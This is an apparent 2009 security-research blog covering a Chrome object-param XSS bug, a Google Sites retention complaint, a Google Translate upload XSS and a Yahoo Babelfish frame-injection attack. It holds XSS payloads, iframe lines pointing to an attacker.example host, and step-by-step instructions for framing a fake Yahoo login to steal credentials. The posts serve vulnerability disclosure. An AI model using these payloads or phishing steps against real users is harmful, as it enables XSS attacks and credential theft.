
Sunday, December 27, 2009

Google Chrome / WebKit - MS Word Scripting Object XSS Payload Execution Bug and Random CLSID Stringency





Google Chrome (including its customized WebKit build) has shown non-conforming behavior when implementing an embedded object with a CLSID parameter. The design bug shows itself in the execution of the object element directly in the context of the browser. The bug manifests when the CLSID of a certain object is passed and a specific URL supplied as a parameter value is allowed to execute inside it. Before jumping into all aspects of this unexpected and chaotic behavior, let's have a brief look at the W3C specification:

<!ELEMENT OBJECT - - (PARAM | %flow;)*
 -- generic embedded object -->
<!ATTLIST OBJECT
  %attrs;                    -- %coreattrs, %i18n, %events --
  declare   (declare)      #IMPLIED  -- declare but don't instantiate flag --
  classid   %URI;          #IMPLIED  -- identifies an implementation --
  codebase  %URI;          #IMPLIED  -- base URI for classid, data, archive --
  data      %URI;          #IMPLIED  -- reference to object's data --
  type      %ContentType;  #IMPLIED  -- content type for data --
  codetype  %ContentType;  #IMPLIED  -- content type for code --
  archive   CDATA          #IMPLIED  -- space-separated list of URIs --
  standby   %Text;         #IMPLIED  -- message to show while loading --
  height    %Length;       #IMPLIED  -- override height --
  width     %Length;       #IMPLIED  -- override width --
  usemap    %URI;          #IMPLIED  -- use client-side image map --
  name      CDATA          #IMPLIED  -- submit as part of form --
  tabindex  NUMBER         #IMPLIED  -- position in tabbing order --
  >


classid = uri [CT]
This attribute may be used to specify the location of an object's implementation via a URI. It may be used together with, or as an alternative to the data attribute, depending on the type of object involved.

data = uri [CT]
This attribute may be used to specify the location of the object's data, for instance image data for objects defining images, or more generally, a serialized form of an object which can be used to recreate it. If given as a relative URI, it should be interpreted relative to the codebase attribute.


So, as per the recommendations, codebase matters a lot. The parameter values should correspond to the embedded object identified by the CLSID; that is the whole point of passing a CLSID to an embedded object.
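
For reference, a spec-conforming use of these attributes looks roughly like the following sketch (the classid shown is the well-known Shockwave Flash identifier; the codebase URL and file names are placeholders):

<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
        codebase="http://example.com/plugins/"
        width="400" height="300">
  <PARAM name="movie" value="intro.swf">
  Alternative text for browsers that cannot instantiate the object.
</OBJECT>

Per the quoted specification, a relative data URI would be resolved against the codebase, and the param values are meaningful only to the implementation named by the classid.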

The code that executes the payload is shown below:
<OBJECT classid="clsid:ae24fdae-03c6-11d1-8b76-0080c744f389">
  <PARAM name="url"
         value="javascript:alert('XSSXSSXSXSXSXSXSXSXSXSXSXSSXSXSXSSXSXXSSS')">
</OBJECT>

Certain facts are mentioned below:

1. The CLSID used here belongs to the MS Word Scripting Object. The good part is that this code does not get executed in Internet Explorer 8, so there is no XSS payload execution there.

2. All the other browsers, such as Mozilla Firefox, Opera, and Safari, do not execute this payload either. Safari, which also implements WebKit at its core, does not show any contradictory behavior in this regard.

3. As far as the HTML5 specification is concerned, it is completely wrong to argue that because Google Chrome implements HTML5 this kind of behavior is acceptable. The latest version of Safari 4 also implements the HTML5 specification to a great extent, yet it does not support this execution behavior.

The contradiction arises as:

1. Google Chrome is itself based on WebKit, and to the best of my knowledge ActiveX is not supported by WebKit or on Linux platforms. CLSIDs are purely Windows object class identifiers.

"ActiveX is only supported by Internet Explorer (and browsers built on top of Internet Explorer) on Windows. Google Chrome, Mozilla Firefox, Apple Safari, and others do not support ActiveX. Instead, these browsers make use of the Netscape Plugin Application Programming Interface (NPAPI)."


More: http://www.google.com/chrome/intl/en/webmasters-faq.html#activex

But the general functionality of DOM object execution follows a top-to-bottom approach, i.e. the document tree: the element at the top is processed first, and so on.

2. Google Chrome executes the payload in the same manner (which can be exploited extensively for XSS) with or without the CLSID parameter. This is contradictory in itself. In no well-behaved browser should XSS payload execution with and without the CLSID be the same; it is not appropriate functionality. As the codebase point in the W3C specification makes clear, the URI points to the object's location. Of course!

Note: If a browser does not support a specific tag attribute, the inline code inside that element should not be executed. One cannot argue that because the browser does not recognize the CLSID it simply passes control to the inline object parameter and executes the URI; that is completely against the specification, since the URI is defined for that object.

On the second point, code execution without the CLSID (illustrated below) is generic; it is in no way similar to payload execution with the CLSID present.
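
For reference, the variant without the CLSID, which Chrome nonetheless handles identically, looks like this (a minimal illustration; the alert string is shortened here):

<OBJECT>
  <PARAM name="url" value="javascript:alert('XSS')">
</OBJECT>

In a standards-following browser neither variant should run the javascript: URI, because no object implementation has been instantiated to consume the parameter.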

The overall picture of this issue with respect to other browsers is presented below:



This represents the overall scenario. The payload can be used to execute XSS attacks. The most plausible solution is not to allow the inline code to execute when a CLSID is present, as discussed in this post.

In a brief exchange with the Google Chrome team about this off-spec behavior, there were certain responses which are unacceptable in any case. Have a look:

"There is a special case for the "data", "movie" and "src" attributes: http://svn.webkit.org/repository/webkit/trunk/WebCore/html/HTMLParamElement.cpp in "isURLAttribute" and "addSubresourceAttributeURLs".

I expect this has to do with our DNS prefetching; we attempt to start downloading
stuff as soon as we know about it. It may be that Chrome special cases this type of
PARAM, expecting it to be a URL. When it finds out there is nothing to grab off the
internet, it is handled like any other URL and the javascript is executed. The code
may need a bit of tweaking to prevent it from executing javascript; it should only
start download the resource if it contains a valid URL."

"The DNS preresolution would, at the most, do a resolution of a domain, but would never trigger any content fetch or JS execution.

There is also some scanning of content, and pre-fetching expected content. I'd be VERY surprised to hear that it leads to execution prior to such necessity."

"I am actually really curious as to why Chrome is behaving this way, even for unknown clsids. I am guessing it is some sort of a heuristic prefetching mechanism that triggers on parameters named "url"?

If my guess is correct, it would be good to have a peek at this mechanism, and limit
it to http / https, just so that it does not introduce problems elsewhere. That said, I do not see any obvious way how the current behavior would have a negative impact on common web sites - i.e., why we should treat it as a security problem."


"I agree with previous assessment that this is not a particular security issue.I also agree that it would be good to understand the behaviour. Hence: It looks to be WebKit simply passing plugin payload URLs to the frame loader, verbatim.This simply means that in Chrome, the following two URLs constructs behave similarly:

1)[object][param name="url" value="javascript:alert(document.domain)">
[/object]

2)[iframe src="javascript:alert(document.domain)"][/iframe]And obviously, it is any given website's responsibility to NOT pass arbitrary attacker-supplied URLs in either of those attributes."


This statement, "it is any given website's responsibility to NOT pass arbitrary attacker-supplied URLs in either of those attributes", completely misses the point with respect to this bug.

Security concern: the differing handling of these payloads consistently favors XSS execution and reflects the browser's failure to follow the standard benchmarks.

The result so far is nothing, and no fix is on the way. The stress is more on not considering it a security bug than on finding the real oddity in it, but one can still have fun with this part.

This behavior is seriously out of line.

Cheers.

Thursday, December 24, 2009

Google Sites Privacy Chaos - Is it unethical or is this the way it has to be? A Talk!

Google Sites provides a service for users to host their websites on Google's domain. I was going through the privacy section of this website, and a serious issue regarding the content policy came to my attention. The policy is presented below:



There is an excerpt in this privacy policy of Google Sites

You may permanently delete any content you create in Google Sites. Because of the way we maintain this service, residual copies of your files and other information associated with your account may remain on our servers for three weeks.


http://www.google.com/sites/privacy.html

This is simply not true. The policy point itself is fine, but considering the actual behavior of the service, it is not being applied. The time period for residual copies is set at three weeks, which I take to mean not more than a month. I personally tested this six months ago. I have noticed that even after six months, the deleted file (a PDF file that I do not want anybody to look into) is still recoverable from the Google site, which is quite unacceptable. According to the policy, deleted content should not reside on Google's servers for more than three weeks.
Let's see:



So there is a discrepancy between the stated policy of Google Sites and its implementation. Is the policy being applied in the right way?

Of course, Google owns the web!

Google Translate - Google User Content - File Upload Cross-Site Scripting (XSS) and Design Stringency - A Talk



The Google Translate service provides an efficient way of translating content. The web is a playground for attackers, and every day a new bug or flaw is detected in the web services provided by the major giants. An interesting exercise is to dissect the web-based design of websites that handle user-generated content. In discussion with Google about this problem, the issue was treated as behavior by design.

The problem (or web bug) lies in the file uploading feature on the Google Translate website. Malicious content such as an XSS payload, an iframe, etc. gets executed and rendered in the context of the running website. In discussion with Google, it was stated that:

"With JavaScript is executed on the translate.googleusercontent.com domain,rather than translate.google.com. This is by design as files uploaded to the translate service are regarded as untrusted content."

There are two features provided by the Google Translate service, which are mentioned below:
1. Translation through file uploading.
2. Direct translation of content online.



Question: Why do users consider translation services secure? What if somebody is performing a monetary transaction or something similarly sensitive through them?

The question is hard to answer. But one thing is sure: for any critical work, translation services should not be used.

Let's have a look at the attack point:

Step 1: Uploading a malicious content file through the Google Translate service
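
A minimal example of the kind of file that triggers the issue (entirely illustrative; attacker.example is a placeholder domain) would be an HTML document such as:

<html>
  <body>
    <!-- script payload executed when the translated file is rendered -->
    <script>alert(document.domain)</script>
    <!-- attacker-controlled frame loaded alongside the translated content -->
    <iframe src="http://attacker.example/"></iframe>
  </body>
</html>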



Step 2: Executing Content



Another layout



Looking at the different domains:

1. translate.google.com

Name: www3.l.google.com
Addresses: 209.85.231.102
209.85.231.100
209.85.231.101
Aliases: translate.google.com

2. translate.googleusercontent.com

Name: googlehosted.l.google.com
Address: 209.85.231.132
Aliases: translate.googleusercontent.com


Both google.com and googleusercontent.com serve the same Google functionality. The dedicated user-content domain can be used for a separate purpose, because the content hosted on it is not trusted.

Looking at it from a different perspective, it would be great if a small message were displayed on the Google Translate service bar, as suggested below:

"Google does not assure the integrity of the source of the content"

After considering this notification idea, I checked Bing's translation service, which has already applied such a notification message. Great.




Maybe it is not a complete solution, but a small step like visibly stating your concern about the content is better design practice.

Note: a previously reported phishing vulnerability in Google Translate was patched, and Google introduced a check on the source and destination translation languages.


Saturday, December 19, 2009

Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency

Yahoo Babel Fish is an online service for translating content into different languages. A design bug makes it possible to conduct FRAME injection attacks in the context of the Yahoo domain, thereby enabling third-party attacks. The issue has been demonstrated at some of my recent conference talks. The flaw can be summed up as follows:

1. There is no referrer check on the origin, i.e. the source of the request.
2. Direct links can be used to send requests.
3. Iframes can be loaded directly into the context of the domain.

Points to ponder:
1. The Yahoo login page performs certain checks for authorized use.
2. Yahoo implements frame busting in the main login page.

It is possible to remove that small piece of code and design a similar page with the same elements for further use. In this way the trust of the primary domain (Yahoo in this case) can be impersonated to make attacks look legitimate. This opens the possibility of various attacks against Yahoo users.
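
For context, the frame-busting snippet referred to above is typically a few lines of JavaScript of the following form (a generic example of the technique, not Yahoo's exact code):

<script type="text/javascript">
  // if the page is loaded inside a frame, break out to the top-level window
  if (top != self) {
    top.location = self.location;
  }
</script>

Stripping these lines from a copied login page is what allows it to be framed by a third-party site.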

Note: no specific notification is displayed at the top of a translated page.

An attacker can conduct a FRAME attack by following the steps below:

1. Remove the above-mentioned frame-busting code from a copy of the main login page.
2. Design the fake page and load it in the context of the Yahoo domain.
3. The inline IFRAME presents a familiar-looking fake login page (see the sketch after these steps).
4. Set a backdoor in the login input boxes for stealing credentials.
5. Trap victims by spreading the manipulated URLs around the web; dedicated spamming can be used.
6. The attack is all set to work.
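
An illustrative fragment of the injected frame from step 3 (all URLs are hypothetical placeholders):

<iframe src="http://attacker.example/fake-yahoo-login.html"
        width="100%" height="600" frameborder="0">
</iframe>

The framed page mimics the Yahoo login form, while its form action posts the entered credentials to the attacker's server.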

Step 1: Injecting IFRAME - Modified














Step 2 – Stealing Credentials















DEMONSTRATION

This attack works successfully. This is a demo setup. You can try some credentials and attempt to log in. :)